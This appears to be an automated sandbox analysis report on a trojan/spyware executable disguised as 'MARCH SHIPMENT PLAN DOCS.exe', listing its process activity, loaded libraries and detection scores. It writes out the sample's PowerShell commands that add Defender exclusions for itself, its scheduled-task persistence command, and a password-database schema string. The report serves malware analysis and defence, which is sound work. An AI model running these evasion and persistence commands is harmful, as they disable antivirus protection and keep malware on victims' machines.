Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -----.cs	Base64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -----.cs	Base64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -----.cs	Base64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'

Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nfoiYwMtQAOK6pF4db.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nfoiYwMtQAOK6pF4db.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@3/3

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

File created: C:\Users\user\AppData\Roaming\PKjWaa.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Mutant created: \Sessions\1\BaseNamedObjects\VKjkQmghZsvftylZdGL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

File created: C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp

Jump to behavior

Source: MARCH SHIPMENT PLAN DOCS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: MARCH SHIPMENT PLAN DOCS.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000336C000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000331C000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000332C000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000335F000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000333A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002F30000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: MARCH SHIPMENT PLAN DOCS.exe	Virustotal: Detection: 52%
Source: MARCH SHIPMENT PLAN DOCS.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

File read: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\PKjWaa.exe C:\Users\user\AppData\Roaming\PKjWaa.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process created: C:\Users\user\AppData\Roaming\PKjWaa.exe "C:\Users\user\AppData\Roaming\PKjWaa.exe"
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Process created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Process created: C:\Users\user\AppData\Roaming\PKjWaa.exe "C:\Users\user\AppData\Roaming\PKjWaa.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Section loaded: msasn1.dll	Jump to behavior
